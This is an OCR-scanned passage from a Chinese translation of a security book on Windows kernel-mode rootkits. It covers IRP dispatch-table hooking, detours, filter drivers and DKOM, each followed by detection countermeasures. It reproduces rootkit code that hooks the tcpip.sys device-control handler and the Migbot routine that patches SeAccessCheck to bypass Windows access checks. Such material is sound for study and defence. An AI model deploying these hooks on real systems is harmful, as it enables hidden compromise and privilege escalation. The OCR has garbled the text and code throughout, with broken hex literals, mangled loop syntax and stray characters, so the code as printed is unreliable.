出 不 受 支 持 的 x86 指 令 ， 这 将 导致 处 理 器 陷阱 并 且 使 系统 停止 。 而 且 ，x64 系 统 上 的 Patchguard 监 控 MSR 的 算 改 。 


第 三 方 检测 引擎 所 面 对 的 问题 是 难以 验证 IA32_ SYSENTER EIP 的 目标 是 合法 的 。IA32_ SYSENTER EIP 应 该 指向 一 个 未 写 入 
文档 的 内 核 函数 KiFastCallEntry() ， 这 个 函数 的 标志 (也 就 是 内 存 中 的 地 址 ) 未 知 。 因 此 ， 检 测 引擎 不 知道 合法 的 SYSENTER 
目标 和 Rootkit 目 标 之 间 的 差别 。 


这 对 于 Rootkit 作 者 是 个 好 消息 ， 因 为 可 以 花费 更 少 的 精力 来 达到 隐身 的 效果 。 可 以 通过 多 种 经 过 证 明 的 方法 来 挫败 
Patchguard (参见 http://www.uninformed.org/?v=3&a=3 和 http://www.uninformed.org/?v=6&a=1) 。 


VORRE (IRP) 钩子 





本 章 的 驱动 程序 体系 结构 部 分 中 讨论 过 ，IRP 是 内 核 驱 动 程序 和 I/O 管 理 器 用 来 处 理 |/O 的 主要 数据 结构 。 为 了 便于 内 核 模式 
驱动 程序 处 理 IRP，1/O 管 理 器 第 一 次 初始 化 驱动 程序 时 ， 必 须 初始 化 其 DRIVER_OBJECT 数 据 结 构 。 从 DDK 的 Windows 头 文 
4, 我们 知道 在 C 语 言 中 的 结构 如 下 : 


typedef struct DRIVER OBJECT { 
CSHORT Type; 
CSHORT Size; 
PDEVICE OBJECT DeviceObject; 
ULONG Flags; 
PVOID DriverStart; 
ULONG DriverSize; 
PVOID DriverSection; 
PDRIVER_EXTENSION DriverExtension; 
UNICODE STRING DriverName; 
PUNICODE STRING HardwareDatabase; 
struct _FAST IO DISPATCH *FastIoDispatch; 
PDRIVER_ INITIALIZE DriverInit; 
PDRIVER_STARTIO DriverStartIo; 
PDRIVER UNLOAD DriverUnload; 
PDRIVER_ DISPATCH MajorFunction [IRP MJ MAXIMUM FUNCTION + 1]; 
} DRIVER_OBJECT; 
typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT; 


我 们 关注 MajorFunction 字 段 (结构 中 的 最 后 一 个 字段 ) ， 它 确实 像 一 张 表格 。 每 个 驱动 程序 必须 用 指向 处 理 驱动 程序 所 连 
接 到 的 设备 的 IRP 的 内 部 函数 的 指针 来 填写 这 个 表格 。 这 些 函 数 称 为 调度 例 程 ， 每 个 驱动 程序 都 具有 这 些 函 数 ， 它 们 的 任务 就 是 
处 理 IRP。 


那么 MO 管理 器 如 何 知 道 在 哪里 管理 这 些 IRP? 每 个 IRP 包 含 了 “ 主 功能 代码 ”， 这 些 代码 告诉 驱动 程序 堆栈 里 的 驱动 程序 
IRP 的 存在 原因 。 这 些 功 能 代码 包括 : 


-IRP_MJ CREATE 这 个 IRP 因 为 初始 化 一 个 创建 操作 而 存在 。 例如， 为 文件 系统 驱动 器 链 创 建 一 个 新 文件 。 

. IRP_MJ READ 这 个 IRP 因 为 初始 化 一 个 读 操 作 而 存在 。 

. IRP_MJ WRITE ”这 个 IRP 因 为 初始 化 一 个 写 操作 而 存在 。 

. IRP_MJ_DEVICE_ CONTROL 这 个 IRP 因 为 特定 设备 类 型 发 出 的 系统 定义 或 者 自 定义 JOCTL (I/O 控 制 代码 ) 而 存在 。 


特定 设备 (例如 ， 一 个 逻辑 卷 ) 驱动 程序 链 中 的 每 个 驱动 程序 在 IRP 沿 驱动 程序 链 下 传 的 时 候 对 其 进行 检查 ， 决 定 对 IRP 做 
何 操作 : 无 操作 ; 做 一 些 处 理 并 /或 完成 处 理 ; 或 者 继续 传递 。 实 际 的 工作 在 驱动 程序 定义 用 于 处 理 每 个 类 型 的 主 功能 代码 的 调 
度 例 程 中 完成 ， 这 些 例 程 负责 所 有 连接 到 驱动 程序 的 设备 。 


那么 ，Rootkit 如 何 能 挂钩 驱动 程序 的 主 浮 数 表 ? 在 我 们 回答 这 个 问题 之 前 ， 你 必须 理解 驱动 程序 为 什么 这 么 做 。 理 由 就 是 
隐蔽 性 。Rootkit 作 者 可 以 很 轻松 地 编写 一 个 驱动 程序 ， 将 其 连接 到 设备 栈 ， 并 开始 检查 IRP， 但 是 这 么 做 没有 隐蔽 性 。Rootkit 
驱动 程序 应 该 向 系统 注册 ， 出 现在 许多 操作 系统 管理 列表 中 ， 但 这 样 很 容易 被 其 他 人 发 现 。 挂 钩 另 一 个 驱动 程序 的 主 图 数 表 还 能 
使 Rootkit 主 驱动 程序 看 上 去 似乎 是 良性 的 ， 因 为 临时 的 检查 者 会 看 到 这 个 驱动 程序 没有 连接 到 任何 设备 栈 。 但 是 实际 上 它 从 设 
备 链 中 接受 IRP， 因 为 它 已 经 挂 钧 了 另 一 个 驱动 程序 的 主 函 数 表 。 最 后 一 个 原因 是 如 果 你 连接 到 一 个 设备 ， 你 的 Rootkit 红 动 程序 
在 设备 释放 时 必须 卸载 ! 


Windows 中 TCP/IP 的 主 函 数 表 上 的 钩子 的 一 个 实例 可 以 参见 Greg Hoglund 的 《IRP Hooking and Device Chains) (IRP 


SF AIRS HE, http://www.Rootkit.com/newsread.php?newsid=846) : 


NTSTATUS InstallTCPDriverHook () 


{ 


NTSTATUS ntStatus; 
UNICODE STRING deviceTCPUnicodeString; 


WCHAR deviceTCPNameBuffer[] = L"\\Device\\Tcp"; 
pFile tcp = NULL; 
pDev_tcp = NULL; 


pDrv_tcpip = NULL; 
RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer) ; 
ntStatus = IoGetDeviceObject Pointer (&deviceTCPUnicodeString, FILE READ DATA, 
&pFile tcp, &pDev_tcp) ; 
if (!NT_ SUCCESS (ntStatus) ) 
return ntStatus; 
pDrv_tcpip = pDev_tcp->DriverObject; 
OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_ DEVICE CONTROL] ; 
if (OldIrpMjDeviceControl) 
InterlockedExchange ((PLONG) &pDrv_tcpip->MajorFunction [IRP MJ DEVICE _ 
CONTROL], (LONG) HookedDeviceControl) ; 
return STATUS SUCCESS; 


} 


第 3 行 显示 了 我 们 感 兴趣 的 设备 : TCP 设 备 一 Windows TCP/IP 栈 tcpip.sys 所 揭示 的 设备 。API 调 用 
loGetDeviceObjectPointer () 得 到 一 个 TCP 设 备 句柄 ， 我 们 将 其 赋 给 变量 pDev_tcp。 这 个 变量 实际 上 是 PDEVICE_OBJECT 结 
构 ， 我 们 所 感 兴趣 的 子 字段 是 tcpip.sys 的 DRIVER_OBJECT 数 据 结构 。 我 们 把 这 个 对 象 赋 给 pDrv tcpip 变 量 。 现 在 需要 做 的 是 提 
取 主 功能 代码 (保存 供 以 后 使 用 ) 并 将 其 赋值 为 Rootkit 调 度 例 程 。 我 们 使 用 InterlockedExchange () API 同 步 对 
DRIVER_OBJECT 对 象 的 访问 。 注 意 ， 这 个 样 例 函 数 挂钩 tcpip.sys 主 功能 代码 IRP_MJ_DEVICE_ CONTROL， 这 个 代码 处 理 驱 动 
程序 发 送 /接收 的 IOCTL。 我 们 也 可 以 同样 简单 地 挂钩 JRP_MJ CREATE 以 监视 新 创建 的 TCP 对 话 。 


这 类 钩子 的 隐蔽 性 仅 和 Rootkit 作 者 使 用 的 实现 方法 相同 。 如 果 作者 选择 使 用 Os 例 程 和 进程 注册 挂钩 的 驱动 程序 和 设 

备 ，IO 管 理 器 和 对 象 管理 器 中 将 出 现 容易 被 发 现 的 踪迹 。Greg Hoglund 建 议 的 一 种 高 级 技术 具有 极 高 的 隐蔽 性 ， 就 是 简单 地 
挂 钧 用 于 大 部 分 驱动 程序 都 完全 没有 注册 的 主 功能 代码 的 默认 OS 完成 例 程 。 例 如 ， 没 有 实现 即 插 即 用 (PnP) 功能 的 WDM 驱 动 
程序 不 会 为 那些 主 功能 代码 (IRP_MJ_PNP) 指定 回调 程序 。 因 此 OS 中 默认 的 处 理 程序 将 会 完成 这 个 IRP。 因 为 许多 驱动 程序 不 
会 实现 多 种 主 功能 ， 挂 钩 这 个 默认 处 理 程序 的 Rootkit 能 够 读 取 MO 管理 器 传 入 和 传 出 的 许多 信息 ， 而 不 必 注 册 为 驱动 程序 。 相 似 
地 ， 隐 蔽 的 IRP 钩 子 Rootkit 不 使 用 Os 提 供 的 原生 API 函 数 在 设备 /驱动 程序 链 中 注册 ， 而 是 为 必需 的 DEVICE_OBJECT 和 
DRIVER_OBJECT 结 构 分 配 核心 内 存 ， 并 且 人 工 修改 自己 所 需要 的 链 ， 添 加 一 个 指向 新 创建 的 数据 结构 的 指针 。 这 样 ，Os 不 会 注 
意 到 链 中 有 新 的 对 象 ， 任 何 遍历 表格 的 检测 程序 都 会 错过 这 些 钩子 Rootkit。 


= IO 请 求 包 钩 子 对策 


这 种 类 型 的 活动 一 般 会 被 已 经 装 入 到 内 核 模式 进行 监控 的 个 人 防火 墙 和 HIDS/HIPS 捕 获 。 在 意 完整 性 的 驱动 程序 应 该 实现 
一 个 回调 例 程 ， 定 期 检查 自己 的 功能 表 以 确定 所 有 功能 项 都 指向 内 部 冰 数 。 本 书 的 防 Rootkit 技 术 部 分 ( 见 第 10 章 ) 中 介绍 的 许 
多 技术 和 免费 工具 能 够 检测 这 种 类 型 的 活动 。 


O” ches 





映像 修改 涉及 对 程序 本 身 的 二 进 制 代码 的 编辑 ， 不 管 这 些 程序 存在 于 磁盘 还 是 内 存 。 虽 然 这 两 种 形式 相似 ， 但 是 磁盘 上 的 二 
进 制 代码 与 内 存 中 的 有 很 大 不 同 。 不 过 映像 (文本 、 代 码 、 可 重 定位 等 ) 的 主要 部 分 相同 。 我 们 将 只 考虑 内 存 中 的 映像 修改 ， 
为 这 与 内 核 模式 Rootkit 最 为 相关 。 


映像 修改 的 概念 常见 于 用 户 模式 Rootkit， 因 为 导入 地 址 表 (Import Address Table, IAT) 钩子 技术 可 以 移植 到 所 有 PE 格 
式 的 可 执行 文件 中 。 但 是 ， 这 里 我 们 将 讨论 的 是 两 个 内 核 模 式 Rootkit 使 用 的 更 具 隐 蔽 性 的 方法 : detoursti ARF (inline 
hook) 。 


detour/patch (修补 ) ARAF ”这 三 个 术语 所 指 的 都 是 相同 的 基本 思路 。Microsoft 在 1999 年 最 早 称 之 为 
detour (http://research.microsoft.com/pubs/68568/huntusenixnt99.pdf) ， 所 以 我 们 从 现在 起 使 用 这 个 术语 。 前 述 的 3 种 
方法 的 目标 都 相同 : 履 盖 二 进 制 映像 中 的 代码 块 以 重 定向 程序 执行 流 。detour 和 Patch 一般 指 修 改 二 进 制 代 码 中 一 个 函数 的 前 几 
个 字 节 (被 称 为 函数 序言 (function prologue) ) 。 这 样 的 修补 实际 上 是 挂钩 整个 消 数 。 一 个 序言 由 设置 使 遂 数 能 够 正常 执行 
的 堆栈 和 CPU 寄存 器 的 汇编 语言 代码 组 成 。 函 数 尾声 (epilogue) 正 相反 ， 它 弹出 堆栈 项 目 并 且 返 回 。 这 两 个 结构 与 程序 代码 
中 采用 的 由 编译 器 实现 的 调用 惯例 相关 。 


内 联 修补 (inline patch) 所 做 的 事情 也 相同 ， 但 是 它 所 履 盖 的 不 是 序言 部 分 ， 而 是 函数 体 的 其 他 地 方 。 不 管 开发 或 者 发 现 
这 种 修补 ， 都 比 detours 要 难得 多 ， 这 是 因为 存在 字 节 对 齐 、 反 汇编 指令 以 及 对 原始 函数 完整 性 和 功能 性 的 保持 (这 些 在 修补 之 
后 要 恢复 以 保持 隐蔽 性 ) 等 问题 。 


detour 一 般 用 JMP 或 者 CALL 指 令 的 一 个 变种 覆盖 序言 ， 但 是 实际 的 指令 和 参数 取决 于 所 涉及 的 体系 结构 以 及 处 理 器 所 运行 
的 内 存 访问 模式 (x86 支 持 保护 模式 、 实 模式 和 虚拟 模式 ) 。 这 是 该 技术 的 难点 和 对 可 移植 性 的 影响 。 不 同 指令 集中 指令 的 尺寸 
也 不 同 ，CPU 制 造 商 对 于 x86 指 令 的 操作 码 (opcode, “operation code” 的 缩写 ) 也 各 有 不 同 。 所 有 这 些 细微 之 处 在 开发 


detour 时 造成 了 差别 。 如 果 detour 没 有 正确 地 实现 ， 所 生成 的 控制 流 可 能 立刻 影响 到 系统 的 稳定 性 。 


detour 针 对 一 个 函数 ， 修 补 和 覆盖 函数 序言 ， 跳 转 到 detour 自 己 的 函数 。 这 时 ，detour 可 以 进行 预先 处 理 ， 例 如 ， 修 改 原 
始 函 数 的 参数 。 然 后 ，detour 的 函数 调 用 所 谓 的 蹦床 (trampoline) 函数 ， 这 个 函数 调用 未 经 修改 的 原始 函数 (传递 所 有 修改 
过 的 参数 ) 。 原 始 函 数 完 成 其 设计 功能 并 且 返 回 detour 函 数 ， 接 着 执行 一 些 后 期 处 理工 作 (例如 ， 修 改 原 始 函 数 结果 ， 为 了 文 
件 隐 藏 ， 可 能 需要 删除 某 些 项 目 ) 。 


编写 一 个 detour 是 非常 乏味 的 工作 。detour 必 须 对 每 个 需要 修补 的 函数 (目标) 进行 定制 。 如 果 目 标 在 操作 系统 修补 或 者 
更 新 之 后 出 现 了 变化 ，detour 就 必须 重 做 。 


因此 ， 开 发 detour 的 第 一 步 是 研究 目标 函数 。 我 们 将 简单 地 看 一 下 Greg Hoglund 的 Migbot Rootkit 是 如 何 修补 
SeAccessCheck () 函数 ， 以 便 有 效 地 禁用 Windows 安 全 令 牌 的 。 为 了 研究 SeAccessCheck () 函数 ， 我 们 可 以 使 用 WinDbg 
的 反 汇 编 命 令 (U) 。Migbot 依 靠 下 面 的 SeAccessCheck 冰 数 序言 : 


55 PUSH EBP 
8 BEC MOV EBP, ESP 
53 PUSH EBX 


33DB XOR EBX, EBX 
385D24 CMP [EBP+24], BL 


在 上 面 的 输出 中 ， 每 行 开始 的 数字 是 对 操作 码 右边 的 反 汇 编 形式 指令 进行 编码 的 二 进 制 操作 码 。Migbot 使 用 这 个 输出 中 的 
操作 码 创建 一 个 SeAccessCheck 的 二 进 制 特征 码 。Migbot 所 做 的 第 一 件 事 是 验证 SeAccessCheck 中 存在 这 些 特征 码 。 如 果 特 征 
码 不 存在 ， 它 就 不 尝试 修补 该 函数 。 进 行 这 个 特征 码 检查 的 函数 如 下 : 


NTSTATUS CheckFunctionBytesSeAccessCheck () 
int i=0; 
char *p = (char *)SeAccessCheck; 
char c[] = { 0x55, 0x8B, OxEC, 0x53, 0x33, OxDB, 0x38, Ox5D, 0x24 }; 
while (i<9) 


{ 
DbgPrint(" - 0x%02X ", (unsigned char)p[i]); 
if(p[i] != c[i]) 
{ 


return STATUS UNSUCCESSFUL; 


} 
i++; 


} 


return STATUS SUCCESS; 


如 果 这 个 函数 成 功 ， 那 么 Migbot 举 试 修补 SeAccessCheck。 现 在 ， 在 进行 修补 时 必须 有 某 个 调用 函数 。 


my function detour seaccesscheck 函 数 将 是 detour 修 补 的 目标 : 


SeAccessCheck: 
__declspec(naked) my function_detour_seaccesscheck () 


{ 


asm 


push ebp 

mov ebp, esp 
push ebx 

区 OE ebx, ebx 
cmp [ebp+24], bl 
_emit OxEA 
_emit OxAA 
_emit OxAA 
_emit OxAA 
_emit OxAA 
_emit 0x08 
_emit 0x00 


让 我 们 来 看 看 这 个 函数 做 了 什么 。 它 完全 由 内 联 汇编 组 成 ， 并 且 声 明 为 裸 (naked) 函数 (没有 函数 序言 或 者 堆栈 操作 ) ， 
这 样 可 以 最 小 化 恢复 CPU 寄存 器 、 标 志和 其 他 堆栈 信息 的 开销 。 第 一 块 指令 从 push ebp 到 cmp[ebp+24，bl 看 上 去 应 该 很 熟悉 
一 一 它们 和 被 覆盖 的 SeAccessCheck 完 全 相同 。 这 就 是 detour 的 “蹦床 ”位 置 ; 它 将 堆栈 设置 为 SeAccess-Check。 汇 编 指 令 
的 最 后 一 块 是 强制 C 编 译 器 生成 一 个 到 地 址 0x08: 0xAAAAAAAA 的 长 跳 转 指令 (操作 码 0xEA) 的 emit 指 令 。 这 个 地 址 只 是 个 无 
用 的 占 位 符 ， 在 运行 时 将 被 蔡 换 为 真正 的 目标 地 址 (因为 我 们 不 可 能 预先 知道 这 个 地 址 ) 。 这 个 关键 的 步骤 由 实际 进行 修补 操作 
的 Migbot 函 数 来 执行 ， 这 个 函数 叫 作 DetourFunctionSeAccessCheck () : 


VOID DetourFunctionSeAccessCheck () 

{ 
//save a pointer to the real SeAccessCheck 
char *actual_ function = (char *)SeAccessCheck; 
char *non paged memory; 
unsigned long detour_address; 
unsigned long reentry address; 
int i = 0; 
//these opcodes are what we will patch into SeAccessCheck 
//notice the 0x11223344 address, which we will need to replace 
//dynamically with the real address of our detour function 
char newcode[] = { OxEA, 0x44, 0x33, 0x22, 0x11, 0x08, 0x00, 0x90, 0x90 }; 
//after jumping into our detour function, we will need 
//some way to get back to SeAccessCheck - since we know we 


//overwrote 9 bytes, we will set our return address to be 
//9 bytes after the start of SeAccessCheck 
reentry address = ((unsigned long) SeAccessCheck) + 9; 
non paged memory = ExAllocatePool (NonPagedPool, 256); 
//this loop copies our detour function into nonpaged kernel memory 
for (1=0;1<256;1i++) 
{ 

( (unsigned char *)non_ paged memory) [i] = 

( (unsigned char *)my function _detour_seaccesscheck) [i]; 

} 
/ /here's where we get the address to replace the fake 
//placeholder address of 0x11223344 with the real address 
//of our detour function we just copied into memory 
detour_address = (unsigned long)non_ paged memory; 
//now paste that address into our opcodes 
*( (unsigned long *) (&newcode[1]) ) = detour_address; 
//now loop over our detour function code and replace 
//the other placeholder address OxAAAAAAAA with our 
//re-entry address so we can jump back to SeAccessCheck 
for (i=0;1<200;1i++) 


{ 


if( (OxAA == ((unsigned char *)non_paged_memory) [i]) && 
(OxAA == ((unsigned char *)non_paged_memory) [i+1]) && 
(OxAA == ((unsigned char *)non paged memory) [i+2]) && 
(OxAA == ((unsigned char *)non_ paged _ memory) [i+3] )) 
{ 
*( (unsigned long *) (&non_paged_memory[i]) ) = reentry address; 
break; 


} 
} 


//now patch 9 bytes of SeAccessCheck! 
for(i=0;i < 9;i++) 
actual function[i] = newcode [i]; 


各 个 步骤 的 详细 解释 请 见 代 码 中 的 注释 。 执 行 这 个 函数 之 后 ，SeAccessCheck 得 以 修补 。 
最 后 要 指出 的 一 点 是 在 Migbot 发 布 之 后 SeAccessCheck 的 代码 已 经 改变 。 下 面 的 WinDbg 输 出 中 显示 的 第 一 个 代码 块 和 以 
前 有 了 很 大 的 不 同 。 因 此 Migbot 中 的 detour 对 这 个 版 本 的 SeAccessCheck 无 效 。 


kd> u 805e5858 
nt !SeAccessCheck+0x10: 


805e5858 a900000002 test eax,2000000h 

805e585d 740b je nt !SeAccessCheck+0x22 (805e586a) 
805e585f 8b4d20 mov ecx, dword ptr [ebp+20h] 

805e5862 25fffffffd and eax, OFDFFFFFFh 

805e5867 0b410c or eax,dword ptr [ecx+0Ch] 

805e586a 0b4518 or eax,dword ptr [ebp+18h] 

805e586d 8b4d28 mov ecx,dword ptr [ebp+28h] 

805e5870 8901 mov dword ptr [ecx] ,eax 


Microsoft 研 究 所 仍然 在 http://research.microsoft.com/en-us/projects/detours/ 维 护 detours 程 序 (免费 的 开源 版 本 名 


为 Detours Express2.1) 。 这 个 程序 可 以 作为 你 自用 的 稳定 detour/patch 程 序 库 。 


Ə detour 对 策 


detour 可 以 通过 比较 已 知 完好 的 版 本 的 二 进 制 代码 和 装 入 到 内 存 的 代码 段 检 测 到 ， 任 何 的 不 同 都 表示 出 现 了 自 改 ，System 
Virginity Verifier (SVV) 之 类 的 工具 使 用 这 种 方法 。 这 种 方法 的 明显 局 限 性 是 ， 如 果 攻 击 者 同时 修补 内 存 映 像 和 磁盘 映像 ， 这 
种 方法 将 会 失败 。 函 数 的 hash 值 也 可 以 用 于 验证 它 是 否 改变 ， 但 是 因为 Microsoft 总 是 在 修补 它 的 函数 ，hash 也 就 总 是 在 改 
变 ， 所 以 这 种 方法 也 可 能 造成 假 阳性 。 


发 现 detour 的 一 个 更 常用 的 方法 是 尝试 反 汇编 头 几 个 字 节 的 函数 序言 ， 确 定 是 否 帮 出 CALIL 或 者 JMP 指 令 。 如 果 有 这 样 的 指 
令 ， 函 数 就 有 可 能 修补 过 。 这 种 方法 会 在 操作 系统 合法 修补 的 函数 上 产生 假 阳性 。 实 际 上 ，Microsoft 已 经 通过 使 其 代码 具有 一 
个 5 个 字 节 的 序言 来 达到 可 以 热 修 补 的 目的 ， 这 个 序言 很 容易 使 用 1 个 字 节 的 JM P/CALL 指 令 和 一 个 32 位 (4 字 节 ) 地 址 覆盖 。 这 
对 于 Microsoft 开 发 人 员 来 说 是 有 用 的 ， 当 函数 中 发 现 缺 陷 时 ， 可 以 友 布 一 个 补丁 ， 覆 盖 有 缺陷 浮 数 的 序言 ， 使 其 跳 转 到 新 版 本 
的 函数 (这 个 函数 人 存在 于 补丁 的 二 进 制 代 码 中 ) 。 


消除 大 部 分 这 种 假 阳性 的 一 种 方法 是 ， 尝 试 解析 所 发 现 的 JMP/CALL 指 令 的 目标 。 但 是 ， 因 为 前 面 提 到 的 原因 ， 这 很 难 做 
到 。 如 果 需 要 更 有 启发 性 的 细节 ， 可 以 参见 本 书 的 附录 。 


NI 
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过 滤器 驱动 程序 和 分 层 驱 动 程序 





在 4.3.1 节 中 已 经 讨论 过 ， 大 部 分 Windows 了 驱动 程 序 是 分 层 的 (或 者 堆 蔷 的 ) ， 这 意味 着 实现 底层 硬件 的 特性 涉及 多 个 驱动 


程序 。 但 是 ， 驱 动 程序 不 一 定 必 须 属于 现 有 的 驱动 程序 /设备 栈 ， 本 质 上 也 不 一 定 要 服务 于 硬件 。 这 样 的 驱动 程序 被 称 为 独立 驱 
动 程序 (monolithic drivers) ， 它 们 独立 于 其 他 驱动 程序 或 者 底层 硬件 存在 。 具 有 讽刺 意味 的 是 ， 独 立 驱 动 程序 的 一 个 例子 就 
是 Rootkit。Rootkit 通 常 不 服务 于 任何 硬件 。 它 一 般 建 立 一 个 虚拟 设备 ， 为 用 户 模 式 应 用 程序 (例如 Rootkit 控 制 器 应 用 程序 ) 
揭示 一 个 句柄 。 


和 独立 驱动 程序 不 同 ， 过 滤器 驱动 程序 是 分 层 驱 动 程序 的 一 种 ， 用 于 为 设备 添加 特定 的 增强 功能 ， 这 与 实现 硬件 核心 能 力 的 
功能 或 者 总 线 驱动 程序 形成 对 比 。 设 备 过 滤器 驱动 程序 为 特定 设备 类 型 (如 键盘 ) 添加 增强 功能 ， 类 过 滤器 驱动 程序 改进 整个 设 
备 家 族 (例如 输入 设备 ) 。 设 备 过 滤器 驱动 程序 的 一 个 例子 是 在 某 个 击 键 序列 (如 ctrl-alt-del) 产生 时 启动 特殊 例 程 的 驱动 程 
序 。 这 个 驱动 程序 展示 了 过 滤器 驱动 程序 的 特质 ， 因 为 它 将 把 自己 插入 键盘 驱动 程序 链 中 ， 并 且 添 加 底层 输入 设备 所 没有 表现 出 
来 的 特定 增强 功能 。 

因为 Windows 驱 动 程序 是 分 层 设 计 的 ，WDM 驱 动 程序 规范 为 驱动 程序 提供 了 特殊 的 API 函 数 ， 用 于 连接 到 现 有 的 驱动 程序 


链 (更 准确 地 说 是 设备 栈 ， 因 为 链 中 的 每 个 驱动 程序 将 自己 的 设备 连接 到 服务 所 有 设备 的 现 有 设备 栈 ) 。 所 以 ， 如 果 我 们 希望 将 
刚才 描述 的 击 键 序列 过 滤器 驱动 程序 装 入 到 键盘 的 设备 栈 ， 可 以 使 用 那些 API 函 数 。 连 接 到 设备 栈 的 一 般 过 程 如 下 : 


1) 调用 loGetDeviceObjectPointer () 获得 指向 设备 栈 中 第 一 个 设备 的 指针 。 
2) 使 用 来 自 设备 栈 中 下 一 个 低层 驱动 程序 的 设备 对 象 信息 ， 用 自 定义 数据 初始 化 自己 的 设备 对 象 。 


3) 调用 loAttachDeviceToDeviceStack () ， 传 递 一 个 指向 你 的 初始 化 设备 对 象 的 指针 和 一 个 指向 希望 连接 的 设备 栈 的 指 
针 (这 个 指针 从 loGetDeviceObjectPointer () 获得 ) 。 


在 最 后 一 步 之 后 ， 驱 动 程序 的 设备 对 象 被 放置 在 设备 栈 的 顶部 。 如 果 驱 动 程序 需要 处 于 堆栈 的 底部 ， 则 必须 在 其 他 驱动 程序 
之 前 连接 到 设备 栈 。 驱 动 程序 框架 没有 提供 明确 的 方法 来 改变 优先 顺序 。 注 意 ， 在 任何 时 候 ， 其 他 键盘 过 滤器 驱动 程序 都 可 以 装 
入 到 该 驱动 程序 之 上 。 如 果 发 生 这 种 情况 ， 这 个 驱动 程序 会 “ 粘 合 ” 在 设备 栈 中 ， 并 且 必 须 正 确 地 卸载 ， 否 则 系统 可 能 会 朋 溃 。 


驱动 程序 接着 将 开始 在 键盘 操作 执行 时 (接收 到 一 个 击 键 ， 导 致 发 出 一 个 IRP 的 轮 询 事件 发 生 等 ) 从 MO 管理 器 那里 接收 和 
发 送 IRP。 它 将 有 机 会 在 设备 栈 的 顶部 处 理 信息 。 


内 核 模式 Rootkit 使 用 设备 栈 的 这 种 基本 操作 来 拦截 和 修改 合法 驱动 程序 需要 处 理 的 信息 (例如 文件 信息 ) 。 内 核 模式 
Rootkit 最 经 常 采 用 过 滤器 驱动 程序 攻击 的 设备 包括 文件 系统 、 键 盘 和 网 络 栈 。 当 然 ， 内 核 模式 中 的 任何 设备 都 很 容易 受到 恶意 
的 过 滤器 驱动 程序 的 影响 。 过 滤器 驱动 程序 通常 用 于 隐藏 文件 、 捕 捉 击 键 或 者 隐藏 活动 的 TCP 会 话 。 


3 过 滤器 驱动 程序 对 策 


因为 分 层 过 滤器 驱动 程序 是 Windows 的 基本 设计 特点 ， 所 以 没有 实用 的 避免 过 滤器 驱动 程序 连接 到 键盘 、 网 络 栈 、 文 件 系 
统 或 者 任何 其 他 关键 系统 设备 栈 的 方法 。 任 何 驱动 程序 都 能 采用 的 一 种 对 策 是 ， 定 期 地 查询 |/O 管 理 器 ， 查 看 其 紧邻 的 高 层 或 低 
层 驱 动 程序 在 装 入 之 后 是 否 已 经 改变 。 任 何 改变 都 值得 调查 ， 但 是 ， 也 可 能 发 生 假 阳 性 ， 因 为 任何 合法 的 过 滤器 驱动 程序 都 可 以 
在 任何 时 候 连 接 。 过 滤器 驱动 程序 连接 到 设备 栈 不 一 定 都 要 引起 恐慌 ， 但 是 这 的 确 可 能 是 恶意 的 驱动 程序 正在 运作 的 几 种 标志 之 


发 现 设备 栈 中 未 经 许可 的 驱动 程序 的 最 基本 技术 是 枚 举 装 入 的 驱动 程序 的 列表 (使 用 前 面 阐述 过 的 
ZwQuerySystemInformation) ， 并 且 用 如 下 的 一 种 或 几 种 方法 筛选 “已 知 是 好 的 ”驱动 程序 : 


. 根据 名 称 ”只 检查 驱动 程序 名 称 ， 确 定 其 为 已 知 的 Windows 了 驱动 程序 。 


. 根据 Hash 计算 知名 系统 驱动 程序 的 唯一 hash 值 。 


. 根据 签名 Windows64 位 操作 系统 要 求 所 有 驱动 程序 使 用 Microsoft Authenticode (验证 码 ) 技术 签名 之 后 ， 才 允许 其 装 入 
内 核 空间 ; 供应 商 必须 得 到 Microsoft 发 出 的 用 于 标记 其 驱动 程序 的 证 书 。 当 驱动 程序 试图 装 入 时 ，Authenticode 服 务 秘密 验证 这 
个 签名 ; 因此 ， 这 种 技术 可 以 确认 所 有 装 入 的 驱动 程序 是 否 进行 了 验证 码 签 名 ， 或 者 至 少 保证 所 有 具有 签名 的 驱动 程序 是 有 效 
的 。 


当然 ， 手 工 检查 始终 是 个 选项 。 各 种 开放 源码 /免费 的 工具 可 以 列 出 系统 中 安装 的 设备 (虚拟 的 和 物理 的 ) 以 及 连接 到 这 些 
设备 的 驱动 程序 。OSR 的 DeviceTree (http://www.osronline.com/article.cfm?article=97) 就 是 一 个 这 样 的 工具 。 


X 直接 内 核对 象 操纵 (DKOM) 


流行 性 





DKOM 由 Jamie Butler 在 与 Greg Hoglund 合 著 的 《Rootkits: Subverting the Windows Kernel) (Rootkit: 颠覆 
Windows 内 核 ) (Addison-Wesley, 2005) 一 书 中 首次 公开 。DKOM 已 经 被 描述 为 第 三 代 Rootkit， 因 为 它 与 传统 的 API 钩 子 
或 者 映像 修改 有 了 很 大 的 不 同 。 目 前 为 止 讨 论 的 许多 技术 都 涉及 利用 侵害 机 制 来 挂钩 或 者 重 定向 普通 系统 操作 的 执行 流 (例如 ， 
系统 处 理 文件 MO) 。DKOM 人 能 够 得 到 和 钩子 、detour 以 及 前 面 讨论 的 许多 技术 相同 的 效果 ， 但 是 不 必 了 解 Rootkit 插 入 执行 流 
的 位 置 。 


相反 ，DKOM 直 接 修改 内 存 中 本 次 执行 流 内 核 和 Executive 所 使 用 的 内 核对 象 。 内 核对 象 是 内 存 中 的 数据 结构 ， 就 像 我 们 已 
经 讨论 过 的 SSDT。 就 像 其 他 应 用 程序 一 样 ，Windows 内 核 必须 使 用 内 存 操作 。 当 内 核 在 内 存 中 存储 这 些 结构 时 ， 这 些 结构 都 是 
脆弱 的 ， 容 易 被 其 他 内 核 模式 驱动 程序 读 取 和 修改 (因为 内 核 空间 中 没有 私有 内 存 的 概念 ) 。 


但 是 ，DKOM 的 优点 在 于 ， 在 Windows2003Service Pack1 之 前 ，DKOM 可 以 完全 由 用 户 模式 实现 ! 因为 Windows 揭 示 了 
一 个 段 对 象 \Device\PhysicalMemory， 这 个 对 象 映 射 到 系统 中 所 有 可 寻 址 的 内 存 ， 任 何 用 户 模式 程序 都 能 打开 指向 这 个 对 象 的 
一 个 句柄 ， 并 且 开 始 修改 内 核 结构 。 这 个 重要 缺陷 在 Windows XP Service Pack2 中 得 以 修复 。 


那么 DKOM 能 够 实现 什么 目标 ”DKOM 的 主要 功能 包括 进程 隐藏 、 驱 动 程序 隐藏 以 及 提升 进程 特权 。 和 挂钩 API 函 数 不 
